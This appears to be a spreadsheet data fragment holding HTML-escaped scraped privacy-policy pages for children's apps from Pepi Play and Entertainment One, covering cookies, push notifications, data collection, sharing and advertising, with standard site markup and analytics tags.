 These third parties are under strict confidentiality obligations and shall never use your child’s information for any purpose save for providing the services._x005F_x000D_
_x005F_x000D_
&lt;p&gt;&lt;strong&gt;Cookies&lt;/strong&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;We use cookies only when you visit our website, we may send cookies to your computer that uniquely identify your browser.</t>
  </si>
  <si>
    <t>We use cookies to improve the quality of our service by storing user preferences and tracking usage information. Most browsers allow you to disable cookies or set your browser to alert you when cookies are being sent to your computer.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&lt;strong&gt;Push Notifications&lt;/strong&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
 &lt;p&gt;For our applications, we may send push notifications about updates or new game from same series.&amp;nbsp;Push notification process automatically provides us with a token which is identified to a specific device, enabling notifications to be sent to that device through OneSignal push notification service.</t>
  </si>
  <si>
    <t>&amp;nbsp;The token is used only to send push notifications.&amp;nbsp; The token is not disclosed and is not used for any other purpose or combined with any other information.&amp;nbsp; Notifications can be turned off through the “Notifications” tab within iOS or Android “Settings”.&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;p&gt;&lt;strong&gt;Links&lt;/strong&gt;&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;p&gt;We may include links to third parties from our website or services.</t>
  </si>
  <si>
    <t>We are not responsible for these companies and including a link to them doesn’t mean that Pepi Play endorses them. So be sure to check their privacy policies if you decide to visit them.&amp;nbsp;We would like to remind you, that all links to third parties from our applications are locked with Kid Lock, that insures your children are safe while playing and staying in the game.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&lt;strong&gt;Changes to this Privacy Policy&lt;/strong&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;We may change or update&amp;nbsp;the Privacy Policy from time to time as we add new or different features, or as the law changes. &amp;nbsp;Thus, you should review the Privacy Policy frequently.</t>
  </si>
  <si>
    <t>If you don’t agree with this Privacy Policy or the Terms of Service, you should not use the sites and services. If you have any questions please contact us at&amp;nbsp;privacy@pepiplay.com&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&lt;strong&gt;Contact Us&lt;/strong&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;If you have any questions or concerns regarding this Privacy Policy, please send us an email at&amp;nbsp;privacy@pepiplay.com&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Our Privacy Policy was last updated on May 9th, 2019.&lt;/p&gt;					&lt;/article&gt;
		&lt;/div&gt;
&lt;div id="footer"&gt;
	&lt;div id="socialIcons"&gt;
		&lt;div class="followUs"&gt;Follow us:&lt;/div&gt;
		&lt;a class="fb" href="https://www.facebook.com/PepiPlay/" target="_blank"&gt;&lt;/a&gt;
		&lt;a class="yt" href="https://www.youtube.com/channel/UCKxj8SmWFGuJVawy35AJhPQ" target="_blank"&gt;&lt;/a&gt;
		&lt;a class="insta" href="https://www.instagram.com/pepi_play/" target="_blank"&gt;&lt;/a&gt;
	&lt;/div&gt;
	&lt;div class="ml-form-embed"
  		data-account="712741:n7m5h7w8o7"
  		data-form="1147594:y8s9s6"&gt;
	&lt;/div&gt;
	&lt;div id="copyright "&gt;
		Copyright © 2023 Pepiplay.</t>
  </si>
  <si>
    <t>&lt;a href="mailto:info@pepiplay.com"&gt;info@pepiplay.com&lt;/a&gt;
	&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt; &lt;!--Main--&gt;
&lt;/div&gt; &lt;!--Page--&gt;
&lt;script type='text/javascript' src='https://www.pepiplay.com/wp-includes/js/comment-reply.min.js?ver=6.2' id='comment-reply-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.pepiplay.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.5.1' id='swv-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' id='contact-form-7-js-extra'&gt;
/* &lt;! [CDATA[ */
var wpcf7 = {"api":{"root":"https:\/\/www.pepiplay.com\/wp-json\/","namespace":"contact-form-7\/v1"}};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.pepiplay.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.5.1' id='contact-form-7-js'&gt;&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="EN"&gt;&lt;head&gt;&lt;meta charset="UTF-8"&gt;&lt;meta name="apple-mobile-web-app-capable" content="yes"&gt;&lt;meta name="apple-mobile-web-app-status-bar-style" content="default"&gt;&lt;meta name="viewport" content="initial-scale=1,width=device-width"&gt;&lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;&lt;meta name="facebook-domain-verification" content="9rd9noe8jmllmdmozd8t7c900k3j1y"&gt;&lt;link rel="dns-prefetch" href=""&gt;&lt;title&gt;App Privacy Policy |&lt;/title&gt;&lt;meta property="og:title" content="App Privacy Policy |  "&gt;&lt;meta name="twitter:title" content="App</t>
  </si>
  <si>
    <t>Privacy Policy |  "&gt;&lt;meta name="keywords" content=""&gt;&lt;meta name="description" content=""&gt;&lt;meta itemprop="name" content=" | App Privacy Policy"&gt;&lt;meta itemprop="description" content=""&gt;&lt;meta itemprop="image" content="?w=800&amp;h=600&amp;format=auto&amp;fit=fill&amp;bg=1A3156&amp;pad=60"&gt;&lt;meta property="og:type" content="website"&gt;&lt;meta property="og:url" content="/app-privacy-en"&gt;&lt;meta property="og:description" content=""&gt;&lt;meta property="og:image" content="?w=1200&amp;h=630&amp;format=auto&amp;fit=fill&amp;bg=1A3156&amp;pad=60"&gt;&lt;meta property="og:site_name" content=""&gt;&lt;link rel="apple-touch-icon" sizes="152x152" href="?w=152&amp;h=152&amp;format=png&amp;fit=fill&amp;bg=1A3156"&gt;&lt;link rel="apple-touch-icon" sizes="180x180" href="?w=180&amp;h=180&amp;format=png&amp;fit=fill&amp;bg=1A3156"&gt;&lt;link rel="icon" type="image/png" href="?w=32&amp;h=32&amp;format=png&amp;fit=fill&amp;bg=1A3156" sizes="32x32"&gt;&lt;link rel="icon" type="image/png" href="?w=192&amp;h=192&amp;format=png&amp;fit=fill&amp;bg=1A3156" sizes="192x192"&gt;&lt;link rel="icon" type="image/png" href="?w=96&amp;h=96&amp;format=png&amp;fit=fill&amp;bg=1A3156" sizes="96x96"&gt;&lt;link rel="icon" type="image/png" href="?w=16&amp;h=16&amp;format=png&amp;fit=fill&amp;bg=1A3156" sizes="16x16"&gt;&lt;link href="?w=16&amp;h=16&amp;format=png&amp;fit=fill&amp;bg=1A3156" rel="icon" sizes="32x32" type="image/png"&gt;&lt;meta name="msapplication-TileColor" content="#007db7"&gt;&lt;meta name="msapplication-TileImage" content="?w=144&amp;h=144&amp;format=png&amp;fit=fill&amp;bg=1A3156"&gt;&lt;meta name="theme-color" content="#007db7"&gt;&lt;meta name="twitter:site" content="entonegroup"&gt;&lt;meta name="twitter:description" content=""&gt;&lt;meta name="twitter:creator" content="@entonegroup"&gt;&lt;meta name="twitter:image" content="?w=800&amp;h=630&amp;format=auto&amp;fit=fill&amp;bg=1A3156&amp;pad=60"&gt;&lt;meta name="twitter:card" content="summary"&gt;&lt;link href="/assets/styles/critical.css" inline rel="stylesheet"&gt;&lt;link rel="stylesheet" href="/assets/styles/major.css"&gt;&lt;link rel="stylesheet" href="/assets/styles/minor.css"&gt;&lt;script&gt;addEventListener('error', window.__e=function f(e){f.q=f.q||[];f.q.push(e)});&lt;/script&gt;&lt;script&gt;!function(e,t,n,s,u,a){e.twq||(s=e.twq=function(){s.exe?s.exe.apply(s,arguments):s.queue.push(arguments);
    },s.version='1.1',s.queue=[],u=t.createElement(n),u.async=!0,u.src='//static.ads-twitter.com/uwt.js',
    a=t.getElementsByTagName(n)[0],a.parentNode.insertBefore(u,a))}(window,document,'script');
    // Insert Twitter Pixel ID and Standard Event data below
    twq('init','ny9qf');
    twq('track','PageView');&lt;/script&gt;&lt;script&gt;!function(f,b,e,v,n,t,s)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'1956659964607912');
    fbq('track', 'PageView');&lt;/script&gt;&lt;noscript&gt;&lt;img height="1" width="1" src="https://www.facebook.com/tr?id=1956659964607912&amp;ev=PageView&amp;noscript=1"&gt;&lt;/noscript&gt;&lt;script type="text/javascript"&gt;_linkedin_data_partner_id = "98876";&lt;/script&gt;&lt;script type="text/javascript"&gt;(function(){var s = document.getElementsByTagName("script")[0];
    var b = document.createElement("script");
    b.type = "text/javascript";b.async = true;
    b.src = "https://snap.licdn.com/li.lms-analytics/insight.min.js";
    s.parentNode.insertBefore(b, s);})();&lt;/script&gt;&lt;noscript&gt;&lt;img height="1" width="1" style="display:none;" alt="" src="https://dc.ads.linkedin.com/collect/?pid=98876&amp;fmt=gif"&gt;&lt;/noscript&gt;&lt;/head&gt;&lt;body&gt;&lt;header class="eone--header"&gt;&lt;div class="eone--header--contents"&gt;&lt;h1 class="eone--header--masthead"&gt;&lt;a class="eone--header--logo" href="/" tabindex="0" aria-label="Home"&gt;&lt;img src="https://eonewebsite.imgix.net/cmsasset/global/global/8fa9166df560.png?w=300&amp;auto=format" aria-label="Entertainment One logo" alt="Entertainment One logo"&gt;&lt;/a&gt;&lt;/h1&gt;&lt;div class="eone--header--links" aria-role="menubar"&gt;&lt;div class="eone--header--social"&gt;&lt;a href="#maincontent" name="maincontent" class="btn-skip type--button type--base" tabindex="0" ga-on="click" ga-event-category="Navigation" ga-event-action="skip"&gt;Skip Navigation&lt;/a&gt; &lt;a href="https://www.facebook.com/EntertainmentOneGroup/" ga-event-action="click header" ga-event-category="Outbound Link -- Social" target="_blank" title="Entertainment One Facebook" aria-label="Entertainment One Facebook" tabindex="0"&gt;&lt;svg class="icon-svg" aria-hidden&gt;&lt;title&gt;Facebook Icon&lt;/title&gt;&lt;desc&gt;Facebook Icon&lt;/desc&gt;&lt;use xlink:href="#icon-Facebook"&gt;&lt;/use&gt;&lt;/svg&gt; &lt;span style="display: none"&gt;Entertainment One Facebook&lt;span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;a href="https://www.linkedin.com/company/entertainment-one" ga-event-action="click header" ga-event-category="Outbound Link -- Social" target="_blank" title="Entertainment One LinkedIn" aria-label="Entertainment One LinkedIn" tabindex="0"&gt;&lt;svg class="icon-svg" aria-hidden&gt;&lt;title&gt;Linkedin Icon&lt;/title&gt;&lt;desc&gt;Linkedin Icon&lt;/desc&gt;&lt;use xlink:href="#icon-Linkedin"&gt;&lt;/use&gt;&lt;/svg&gt; &lt;span style="display: none"&gt;Entertainment One LinkedIn&lt;span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;a href="https://twitter.com/entonegroup/" ga-event-action="click header" ga-event-category="Outbound Link -- Social" target="_blank" title="Entertainment One Twitter" aria-label="Entertainment One LinkedIn" tabindex="0"&gt;&lt;svg class="icon-svg" aria-hidden&gt;&lt;title&gt;Twitter Icon&lt;/title&gt;&lt;desc&gt;Twitter Icon&lt;/desc&gt;&lt;use xlink:href="#icon-Twitter"&gt;&lt;/use&gt;&lt;/svg&gt; &lt;span style="display: none"&gt;Entertainment One Twitter&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;button class="eone--menu--toggle eone--hamburger type--button" aria-role="button" tabindex="0" ga-on="click" ga-event-category="Menu" ga-event-action="open"&gt;&lt;span&gt;MENU&lt;/span&gt; &lt;span class="eone--hamburger--inner" aria-role="group"&gt;&lt;span&gt;&lt;/span&gt; &lt;span&gt;&lt;/span&gt; &lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;/div&gt;&lt;/header&gt;&lt;aside class="eone--menu type--title" aria-role="menu"&gt;&lt;span class="eone--close eone--menu--toggle type--button" aria-role="button" ga-on="click" ga-event-category="Menu" ga-event-action="close"&gt;CLOSE&lt;/span&gt;&lt;nav class="eone--nav type--doublepearl"&gt;&lt;ul class="eone--menu--main" aria-role="group"&gt;&lt;li aria-role="menuitem"&gt;&lt;a href="/"&gt;Home&lt;/a&gt;&lt;/li&gt;&lt;li class="eone--menu--subsections--container"&gt;&lt;a href="/about-eone/"&gt;About&lt;/a&gt;&lt;ul class="eone--menu--subsections type--minion" aria-role="group"&gt;&lt;li aria-role="menuitem"&gt;&lt;a href="/about-eone/?service=film"&gt;Film&lt;/a&gt;&lt;/li&gt;&lt;li aria-role="menuitem"&gt;&lt;a href="/about-eone/?service=television"&gt;Television&lt;/a&gt;&lt;/li&gt;&lt;li aria-role="menuitem"&gt;&lt;a href="/about-eone/?service=family_and_brands"&gt;Family Brands&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;li aria-role="menuitem"&gt;&lt;a href="/press/"&gt;Press&lt;/a&gt;&lt;/li&gt;&lt;li aria-role="menuitem"&gt;&lt;a href="/careers/"&gt;Life at eOne&lt;/a&gt;&lt;/li&gt;&lt;li aria-role="menuitem"&gt;&lt;a href="/eone-in-focus/"&gt;eOne in Focus&lt;/a&gt;&lt;/li&gt;&lt;li aria-role="menuitem"&gt;&lt;a href="/companies/"&gt;Companies&lt;/a&gt;&lt;/li&gt;&lt;li aria-role="menuitem"&gt;&lt;a href="/contact-us/"&gt;Contact&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div class="eone--menu--footer"&gt;&lt;ul aria-role="group"&gt;&lt;li aria-role="menuitem" class="eone--menu--language"&gt;&lt;a href="https://www.entertainmentone.com/"&gt;English&lt;/a&gt;&lt;/li&gt;&lt;li aria-role="menuitem" class="eone--menu--language"&gt;&lt;a href="https://www.filmsseville.com/"&gt;Français&lt;/a&gt;&lt;/li&gt;&lt;li aria-role="menuitem"&gt;&lt;span&gt;Visit Us&lt;/span&gt; &lt;span class="eone--menu--social"&gt;&lt;a href="https://www.facebook.com/EntertainmentOneGroup/"&gt;&lt;svg class="icon-svg"&gt;&lt;use xlink:href="#icon-Facebook"&gt;&lt;/use&gt;&lt;/svg&gt;&lt;div style="display:none"&gt;eOne Facebook link&lt;/div&gt;&lt;/a&gt;&lt;a href="https://www.linkedin.com/company/entertainment-one/"&gt;&lt;svg class="icon-svg"&gt;&lt;use xlink:href="#icon-Linkedin"&gt;&lt;/use&gt;&lt;/svg&gt;&lt;div style="display:none"&gt;eOne LinkedIn link&lt;/div&gt;&lt;/a&gt;&lt;a href="https://twitter.com/entonegroup/"&gt;&lt;svg class="icon-svg"&gt;&lt;use xlink:href="#icon-Twitter"&gt;&lt;/use&gt;&lt;/svg&gt;&lt;div style="display:none"&gt;eOne Twitter link&lt;/div&gt;&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/nav&gt;&lt;/aside&gt;&lt;main class="eone--page"&gt;&lt;div class="eone--hero" style="background-image:url(https://eonewebsite.imgix.net/cmsasset/global/global/4a9848058eb2.png?h=500&amp;bs=inherit&amp;bm=overlay&amp;bx=0&amp;by=0&amp;blend=https://s3.amazonaws.com/eonewebsite-prod/cmsasset/page/about/5e81f167c574.jpg&amp;auto=compress)"&gt;&lt;header class="anim--fadeup eone--hero--header"&gt;&lt;h1 class="type--title type--greatprimer"&gt;App Privacy Policy&lt;/h1&gt;&lt;/header&gt;&lt;/div&gt;&lt;section class="eone--generic"&gt;&lt;article class="eone--press--article"&gt;&lt;nav class="eone--generic--dropdown"&gt;&lt;a href="/" class="eone--back eone--back__generic type--title type--primer"&gt;&amp;larr; BACK&lt;/a&gt;&lt;div class="eone--dropdown type--sub"&gt;&lt;button class="type--sub" aria-label="categories menu" tab-index="0"&gt;&lt;span class="eone--dropdown--heading"&gt;Select Language&lt;/span&gt;&lt;/button&gt;&lt;ul class="privacy-dropdown"&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/nav&gt;&lt;div class="eone--generic--body type--body type--primer"&gt;&lt;p&gt;This Entertainment One App Privacy Policy (the &amp;ldquo;Privacy Policy&amp;rdquo;) applies to all children&amp;rsquo;s mobile apps (&amp;ldquo;Apps&amp;rdquo;) provided through app stores that provide or link to this Privacy Policy, including Apps for the Peppa Pig, PJ Masks, Ben &amp;amp; Holly and Ricky Zoom brands (the &amp;ldquo;Brands&amp;rdquo;).&amp;nbsp; Please note that websites for these Brands operate under separate privacy policies as posted on those sites.&amp;nbsp;&lt;/p&gt;&lt;p&gt;Parents or guardians should read this Privacy Policy and, as appropriate, explain to any children using our Apps the implications of this Privacy Policy.&lt;/p&gt;&lt;h1&gt;1.About us&lt;/h1&gt;&lt;p&gt;Entertainment One UK Limited, registered in England and Wales with company number 02989602, and located at 45 Warren Street, London, W1T 6AG, UK.&lt;/p&gt;&lt;p&gt;We are committed to protecting your privacy.</t>
  </si>
  <si>
    <t>This Privacy Policy explains how we collect, store, process and use your/your children&amp;rsquo;s personal information when you use our Apps. It also describes your rights in relation to your/your children&amp;rsquo;s personal information and your choices about our collection and use of such information. You should read this Privacy Policy in conjunction with our&amp;nbsp;posted &lt;a href="https://www.entertainmentone.com/app-terms-conditions-en/"&gt;Terms of Use&lt;/a&gt; (the &amp;ldquo;Terms&amp;rdquo;).&lt;/p&gt;&lt;p&gt;&lt;em&gt;Notice for residents of the EU/EEA, UK, Switzerland and other jurisdictions with similar data privacy and protection laws&lt;/em&gt;:</t>
  </si>
  <si>
    <t>We operate as a &amp;ldquo;data controller&amp;rdquo; under such laws with respect to personal information we collect and process about you/your children. We are registered as a data controller with the UK Information Commissioner&amp;rsquo;s Office (reg. no.</t>
  </si>
  <si>
    <t>Z9919769).&lt;/p&gt;&lt;h1&gt;2.Children&amp;rsquo;s privacy&lt;/h1&gt;&lt;p&gt; The Apps are designed partly for use by children, and we are therefore extra cautious when processing personal information. Our Apps generally contain a children&amp;rsquo;s section (the &amp;ldquo;Children&amp;rsquo;s Area&amp;rdquo;) and a separate parents/guardians section (the &amp;ldquo;Grown-Up Area&amp;rdquo;).</t>
  </si>
  <si>
    <t>In the Children&amp;rsquo;s Area, children participate by playing games, reading e-books and/or watching videos. The Children&amp;rsquo;s Area does not generally enable a child to enter personal information. Typically, the only part of the Apps where anyone can enter personal information directly is the Grown-Up Area.</t>
  </si>
  <si>
    <t>Accordingly, we do not generally expect to collect personal information directly from any children, except at the direction of a parent/guardian.&lt;/p&gt;&lt;p&gt;We take reasonable precautions to make the Grown-Up Area accessible only to adults. If we believe a child using the Grown-Up Area is under 13 we will not process any personal information of that child without the consent of the parent or guardian. If the user is 13 or over we will only collect and process personal information consistent with this Privacy Policy and applicable laws, including any required consents.</t>
  </si>
  <si>
    <t>If you believe we have collected personal information from a child under 13 without parental consent, please let us know via the contact information below and we will endeavor to promptly delete it.&lt;/p&gt;&lt;p&gt; For added assurance, our Apps are enrolled in the &lt;a href="https://www.kidsafeseal.com/aboutourprogram.html" target="_blank"&gt;kidSAFE Seal Program&lt;/a&gt;&amp;nbsp;dependently reviewed, certified and/or listed by kidSAFE as meeting their standards of online safety and privacy.&lt;/p&gt;&lt;h1&gt;3.​Types of personal information we collect&lt;/h1&gt;&lt;p&gt; We may collect the following personal information from you:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;em&gt;Profile and contact information&lt;/em&gt;, including name, email address, postal address, country, date of birth, username and password (or other such authentication information), gender and marketing preferences;&lt;/li&gt;&lt;li&gt;&lt;em&gt;Limited children&amp;rsquo;s information&lt;/em&gt; &lt;em&gt;if you permit&lt;/em&gt;, including name(s), date(s) of birth and gender, as well as any information you (or your child) submit as part of a promotion or competition;&lt;/li&gt;&lt;li&gt;&lt;em&gt;Transactional information&lt;/em&gt; such as for paid subscription to the Apps (such as subscription type, current status, and subscription and expiration dates);&lt;/li&gt;&lt;li&gt;&lt;em&gt;Survey information&lt;/em&gt; in response to any customer satisfaction surveys or market research (unless these are provided anonymously);&lt;/li&gt;&lt;li&gt;&lt;em&gt;Communications&lt;/em&gt; between you and us, such as via email, web form, mail, phone, or other channels;&lt;/li&gt;&lt;li&gt;&lt;em&gt;Online User Activity&lt;/em&gt; as described below in Section 10.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>If you provide us with personal information regarding a minor, you represent that you either have authority (as parent/guardian) or consent of an individual with such authority to permit us to use the information in accordance with this policy. If you provide us with personal information regarding anyone else, you represent that you have that person&amp;rsquo;s consent to give us their information and permit us to use it in accordance with this policy.&lt;/p&gt;&lt;h1&gt;4.How and when we collect your/your children&amp;rsquo;s personal information&lt;/h1&gt;&lt;p&gt;We may collect personal information from you when you/your children:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Participate in, access or sign up to any of the Apps&amp;rsquo; activities, paid subscriptions, online content, newsletters, or competitions;&lt;/li&gt;&lt;li&gt;Create an online account or fill in any other forms on the Apps;&lt;/li&gt;&lt;li&gt;Contact our customer service teams or request information from us in any other way;&lt;/li&gt;&lt;li&gt;Respond to communications from us;&lt;/li&gt;&lt;li&gt;Participate in our customer satisfaction surveys or other market research; or&lt;/li&gt;&lt;li&gt;Communicate or engage with us via social networking websites, third party apps or similar technologies.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;When you browse or otherwise use the Apps, we will also collect certain information about your device and your use of the Apps using cookies and similar technologies as further described below.&lt;/p&gt;&lt;p&gt;We will indicate where any personal information we have requested is mandatory or optional. Please note that if you decide not to provide certain information which we have indicated is mandatory, in some circumstances this may mean we are unable to provide you with a certain service or product.&lt;/p&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>We may also collect personal information about you from third party sources, such as from our subcontractors.&lt;/p&gt;&lt;h1&gt;5.How we may use your/your children&amp;rsquo;s personal information&lt;/h1&gt;&lt;p&gt;We (or third party data processors acting on our behalf) may collect, store and use your/your children&amp;rsquo;s personal information for the following purposes, to the extent permitted by applicable laws:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;​To provide our Apps, activities or online content and to provide information about our Apps, including to authenticate users and offer access, activities or online content which may be personalized or tailored to you/your children;&lt;/li&gt;&lt;li&gt;To identify and contact you/your child as the winner of a particular competition;&lt;/li&gt;&lt;li&gt;To send out newsletters and other communications that you/your children have subscribed to;&lt;/li&gt;&lt;li&gt;For system administration purposes and for internal operations (including troubleshooting, data analysis, and testing) to ensure the Apps operate properly;&lt;/li&gt;&lt;li&gt;To analyse use of the Apps to improve the user experience and to ensure that content is presented in the most effective manner for our users;&lt;/li&gt;&lt;li&gt;To notify you of any changes to the Apps or provide other administrative notices;&lt;/li&gt;&lt;li&gt;To provide customer support and ensure we provide a good level of customer service;&lt;/li&gt;&lt;li&gt;Where you have given us your consent or we are otherwise permitted by law, to contact you/your children (including by e-mail) with products and services which we think may interest you/your children &amp;ndash; you can unsubscribe from our marketing communications at any time;&lt;/li&gt;&lt;li&gt;Where you have given your consent, to pass your personal information to selected third parties for marketing purposes;&lt;/li&gt;&lt;li&gt;For geo-based redirection (so that if you see the correct version of the Apps depending on the country from which you are accessing the Apps);&lt;/li&gt;&lt;li&gt;For security and fraud prevention, to ensure that our Apps are safe and secure, to comply with applicable laws and regulations, and to adhere to our policies and contractual rights.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;We may also collect information about visitors to and users of the Apps for the purposes of de-identified and aggregate statistics or reporting purposes.&lt;/p&gt;&lt;h1&gt;6.Legal basis for processing your personal information&lt;/h1&gt;&lt;p&gt;Certain jurisdictions, such as the EU/EEA/UK/Switzerland, require that a business satisfy one or more legal bases to process personal information. We will therefore only process your/your child&amp;rsquo;s personal information where we have a legal basis to do so, and the legal basis will depend on the purposes for which we have collected and use the personal information. The legal basis is generally one or more of the following:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;em&gt;Consent&lt;/em&gt;: For example, where you have provided your consent to receive certain marketing from us or permit collection and processing of your/your children&amp;rsquo;s personal information.</t>
  </si>
  <si>
    <t>You can withdraw your consent at any time by notifying us as provided below. You can also click on the &amp;ldquo;unsubscribe&amp;rdquo; link at the bottom of any marketing email.&lt;/li&gt;&lt;li&gt;&lt;em&gt; Our legitimate business interests&lt;/em&gt;: Where it is necessary for us to provide the Apps for your use, understand our customers, promote our services and operate effectively as a provider of children&amp;rsquo;s content and related services, provided in each case that this is done in a legitimate way which does not unduly affect your or your child&amp;rsquo;s privacy and other rights.&lt;/li&gt;&lt;li&gt;&lt;em&gt;Compliance with law&lt;/em&gt;: Where we are subject to a legal obligation and need to use your personal information in order to comply with that obligation.&lt;/li&gt;&lt;/ul&gt;&lt;h1&gt;7.Where we store your personal information&lt;/h1&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>Our Services are primarily provided from the US, so you should understand that when using our Apps you are directly sending your information to US-based Services.&amp;nbsp; In addition, any other personal information that we collect may be transferred to, and stored at, locations outside the country you reside in, including locations that may not have data protection laws as stringent as those in your country (such as the strict laws in the EU/EEA).&lt;/p&gt;&lt;p&gt; Whenever we transfer your/your child&amp;rsquo;s personal information as described above, we will implement reasonable safeguards designed to protect such personal information and handle it securely, in accordance with this policy. Where applicable, we rely on technical controls, contractual commitments and approved data transfer mechanisms (such as the EU &amp;ldquo;Standard Contractual Clauses&amp;rdquo;) to maintain adequate safeguards in the recipient country.&lt;/p&gt;&lt;h1&gt;8.How we store and secure your personal information&lt;/h1&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>We take steps to ensure that the personal information we collect is retained for only as long as it is necessary for the purpose for which it was collected. After this period it will be deleted or in some cases anonymised.&lt;/p&gt;&lt;p&gt;Where we have collected personal information based on your consent and we have no other lawful basis to continue with that processing, if you subsequently withdraw your consent then we will reasonably endeavor to delete or anonymize your personal information. However, please note that where you unsubscribe from our marketing communications, we will keep a record of your email address to ensure we do not send you marketing emails in future.&lt;/p&gt;&lt;p&gt;We endeavor to only keep personal information while we have an active relationship with you (e.g., ongoing services) and thereafter when needed for business or legal purposes.</t>
  </si>
  <si>
    <t>We may keep anonymised and statistical data indefinitely but take care to ensure that it can no longer identify or be connected to any individual.&lt;/p&gt;&lt;h1&gt;9.Do we share personal information with any third parties?&lt;/h1&gt;&lt;p&gt;We may share your personal information within our group of companies (i.e., our legal affiliates including our ultimate parent company and its subsidiaries), subject to the terms of this Privacy Policy and applicable laws.&amp;nbsp;For example, they may support certain business operations or want to contact you regarding other products or services that may be of interest to you.&lt;/p&gt;&lt;p&gt;We may share your/your children&amp;rsquo;s personal information with our vendors (data processors) who may use it strictly as necessary to develop, host and provide the Apps to you, and provide associated services and marketing activities on our behalf.&lt;/p&gt;&lt;p&gt;If a third party acquires all (or substantially all) of our business and/or assets, we may disclose your/your child&amp;rsquo;s personal information to that third party in connection with the acquisition, subject to this Privacy Policy. We may also disclose your/your child&amp;rsquo;s personal information where we are required to do so by applicable law, by a governmental body or by a law enforcement agency. We may also disclose personal information to protect the rights, property or safety of us or our users, or others, and in order to enforce or apply our terms and conditions (this includes exchanging information with other companies and organisations for the purposes of fraud protection and credit risk reduction).&lt;/p&gt;&lt;p&gt;Other than as described in this Privacy Policy, we will not disclose, sell or rent your/your child&amp;rsquo;s personal information to any third party unless you have specifically consented to it.</t>
  </si>
  <si>
    <t>If you do consent but later change your mind, you may contact us and we will cease any such activity. Where appropriate, we will limit sharing of your information in accordance with the choices that you have provided us and applicable law.&lt;/p&gt;&lt;h1&gt;10.Online user activity&lt;/h1&gt;&lt;p&gt;Our Apps may collect certain information about your device and use of our Apps by automated means, including but not limited to software development kits (SDKs) and other similar technologies (&amp;ldquo;Online User Activity&amp;rdquo;). We use these tools to manage user sign-in, subscription status, and for analytics purposes to track how users generally interact with our Apps.</t>
  </si>
  <si>
    <t>We endeavor to only use SDKs that are consistent with our Terms and this Privacy Policy, including strict limitations on collection or use of children&amp;rsquo;s personal information.&lt;/p&gt;&lt;p&gt;When you use the Apps, the information that we may collect by automated means includes, for example:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;em&gt;Usage Details&lt;/em&gt; about your interaction with our Apps (such as the date, time, and length of visits, and specific content accessed during the visits, frequency of the visits, and other user activity events);&lt;/li&gt;&lt;li&gt;&lt;em&gt;Device Information&lt;/em&gt; including the IP address and other details of a device that you use to connect with our Apps (such as device type and unique device identifier, operating system, mobile network information); and&lt;/li&gt;&lt;li&gt;&lt;em&gt;Regional information&lt;/em&gt; where you or your device provide us with information about your device&amp;rsquo;s general region.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;To provide enhanced privacy protections for our users, Online User Activity is typically anonymized or pseudonymized when used for general analytics or other purposes so it is not associated with you/your child except as necessary to provide the Apps (e.g., account and subscription status for access to paid content).&lt;/p&gt;&lt;h1&gt;11.Third party advertisements and sites&lt;/h1&gt;&lt;p&gt; The Apps do not engage in any behavioural advertising.&amp;nbsp;As described in our Terms, the Apps may contain kid-friendly contextual advertisements or links to third party apps, websites and services. Please note that this Privacy Policy applies only to the personal information that we collect through the Apps or receive from third parties and we cannot be responsible for personal information that third parties may collect, store and use through their own apps, websites and services.</t>
  </si>
  <si>
    <t>You should always read carefully the privacy policy of each such third party apps, websites and services you visit or use.&lt;/p&gt;&lt;p&gt; In addition, when you provide to us information on a third party site or platform, (for example via social media platforms), the information may also be collected by third parties and may be subject to their privacy policy.&lt;/p&gt;&lt;p&gt;Our Apps may display contextual advertisements served by SuperAwesome Trading Limited (&amp;ldquo;SuperAwesome&amp;rdquo;) through its platform known as &amp;lsquo;AwesomeAds&amp;rsquo;, which is designed specifically for younger audiences, including those aged under the age of digital consent. SuperAwesome wants us to share the following additional details with you:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;</t>
  </si>
  <si>
